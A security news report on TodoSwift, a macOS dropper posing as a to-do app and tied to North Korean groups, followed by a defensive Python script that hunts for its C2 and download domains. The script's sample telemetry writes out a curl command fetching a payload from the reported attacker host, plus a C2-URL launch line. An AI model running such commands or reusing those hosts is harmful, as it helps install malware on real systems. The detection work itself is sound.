New macOS Malware TodoSwift Linked to North Korean Hacking Groups
Cybersecurity researchers have discovered a new piece of macOS malware dubbed TodoSwift that shares similarities with known malicious software linked to North Korean hacking groups.
“Several characteristics of this software align with malware previously identified to have origins in North Korea (DPRK) — specifically the cybercriminal group identified as BlueNoroff — such as KANDYKORN and RustBucket,” Kandji security researcher Christopher Lopez said in an analysis.
RustBucket, first publicly documented in July 2023, refers to an AppleScript-based backdoor capable of retrieving next-stage payloads from a command-and-control (C2) server.
Elastic Security Labs disclosed another macOS malware, KANDYKORN, last year; it was used in an intrusion targeting blockchain engineers at an unnamed cryptocurrency exchange platform.
Delivered through a sophisticated multi-stage infection chain, KANDYKORN can access and exfiltrate data from the victim's machine. It is also able to terminate arbitrary processes and execute commands on the compromised host.
A characteristic shared by the two malware families is the use of linkpc[.]net domains for C2. Both RustBucket and KANDYKORN are attributed to the Lazarus Group (and its sub-cluster BlueNoroff).
“The DPRK, operating through units like the Lazarus Group, persistently targets cryptocurrency industry entities with the aim of appropriating digital currency to evade international restrictions that impede their economic and aspirational advancement,” Elastic said at the time.
“In this instance, they focused on blockchain experts active on a communal chat server with a pretext catered to their competencies and interests, offering financial benefits underneath.”
The latest findings from the Apple device management and security company show that TodoSwift is distributed in the guise of an application named TodoTasks, which contains a dropper component.

This component is a graphical user interface (GUI) application written in SwiftUI that displays a decoy PDF to the victim while, in the background, downloading and executing a second-stage binary, a technique also used by RustBucket.
The decoy PDF is a benign Bitcoin-related document hosted on Google Drive, whereas the malicious binary is fetched from an attacker-controlled domain (“buy2x[.]com”). The exact details of the second-stage binary are still under investigation.
“The adoption of a Google Drive link and passing the C2 URL as a command-line argument to the phase 2 binary is in accordance with earlier DPRK malware targeting macOS systems,” Lopez remarked.
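For defenders, the two tradecraft details the article supports (C2 and download hosts on linkpc[.]net and buy2x[.]com, and a C2 URL handed to the stage-2 binary as a command-line argument) translate directly into a hunting query over process-execution telemetry. The script below is an added example, not code from Kandji or from the TodoSwift analysis. The event schema (pid, parent_image, image, cmdline), the sample telemetry, the hostname update.linkpc.net and the on-disk paths are all constructed for illustration; only the two indicator domains come from the reporting above. The heuristic tier (a non-system binary launched from an app bundle with a URL argument) is an assumption about how the described behaviour would look in EDR data, not something the article states.

```python
"""Hunt for TodoSwift-style stage-2 launches in macOS process-execution telemetry.

Added example. Indicator domains are taken from the article (de-fanged there,
re-fanged here for matching); everything else is constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Indicators named in the reporting.
IOC_HOSTS = {"buy2x.com"}        # host the stage-2 binary is fetched from
IOC_SUFFIXES = ("linkpc.net",)   # dynamic-DNS family used for C2 by RustBucket and KANDYKORN

# Assumption: vendor-shipped tools such as curl or open legitimately take URLs
# on the command line, so binaries under these prefixes skip the heuristic tier.
SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/System/", "/Library/Apple/")

URL_RE = re.compile(r"https?://[^\s'\"]+")
APP_BUNDLE_RE = re.compile(r"\.app/Contents/MacOS/")


@dataclass
class Finding:
    pid: int
    image: str
    url: str
    tier: str      # "ioc" (known indicator) or "heuristic" (behavioural)
    reason: str


def classify_host(host: str) -> Optional[str]:
    """Return a reason string if the host matches a known indicator, else None."""
    host = host.lower().rstrip(".")
    if host in IOC_HOSTS:
        return "matches stage-2 download host from the TodoSwift report"
    for suffix in IOC_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return f"{suffix} dynamic-DNS domain used for C2 by RustBucket/KANDYKORN"
    return None


def analyze_event(event: dict) -> list[Finding]:
    """Inspect one process-execution event (constructed schema: pid, parent_image, image, cmdline)."""
    findings = []
    for url in URL_RE.findall(event["cmdline"]):
        host = urlparse(url).hostname or ""
        reason = classify_host(host)
        if reason:
            findings.append(Finding(event["pid"], event["image"], url, "ioc", reason))
            continue
        # Behavioural tier: the article notes the stage-2 binary receives its C2 URL
        # as a command-line argument from the GUI dropper. A non-system binary spawned
        # by an app bundle with a URL argument is therefore a lower-confidence hit.
        spawned_by_app = bool(APP_BUNDLE_RE.search(event["parent_image"]))
        system_binary = event["image"].startswith(SYSTEM_PREFIXES)
        if spawned_by_app and not system_binary:
            findings.append(Finding(event["pid"], event["image"], url, "heuristic",
                                    "non-system binary spawned from an app bundle with a URL argument"))
    return findings


def hunt(events: list[dict]) -> list[Finding]:
    """Run analyze_event over a batch of events and collect every finding."""
    out: list[Finding] = []
    for event in events:
        out.extend(analyze_event(event))
    return out


# Constructed sample telemetry (not real logs): one linkpc.net C2 argument, one
# fetch from the reported download host, one benign developer curl, and one
# unknown-domain launch that should only trip the heuristic tier.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent_image": "/Applications/TodoTasks.app/Contents/MacOS/TodoTasks",
     "image": "/Users/dev/Library/Caches/.todo",
     "cmdline": "/Users/dev/Library/Caches/.todo https://update.linkpc.net/api/v1"},
    {"pid": 4102, "parent_image": "/Applications/TodoTasks.app/Contents/MacOS/TodoTasks",
     "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://buy2x.com/payload -o /tmp/.todo"},
    {"pid": 4103, "parent_image": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://github.com/example/repo.git"},
    {"pid": 4104, "parent_image": "/Applications/Notes.app/Contents/MacOS/Notes",
     "image": "/Users/dev/Library/Caches/helper",
     "cmdline": "/Users/dev/Library/Caches/helper https://cdn.example.org/update"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.tier}] pid={f.pid} {f.image} -> {f.url}: {f.reason}")
```

Run against the constructed telemetry, the two indicator matches surface as "ioc" findings and the Notes.app child as a "heuristic" one, while the Terminal-launched curl is ignored because it is a system binary with an unknown domain. In a real deployment the domain sets would be fed from a threat-intel source rather than hard-coded, and the heuristic tier should be tuned against a baseline of your fleet's legitimate app-bundle helpers before it is used for alerting rather than hunting.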

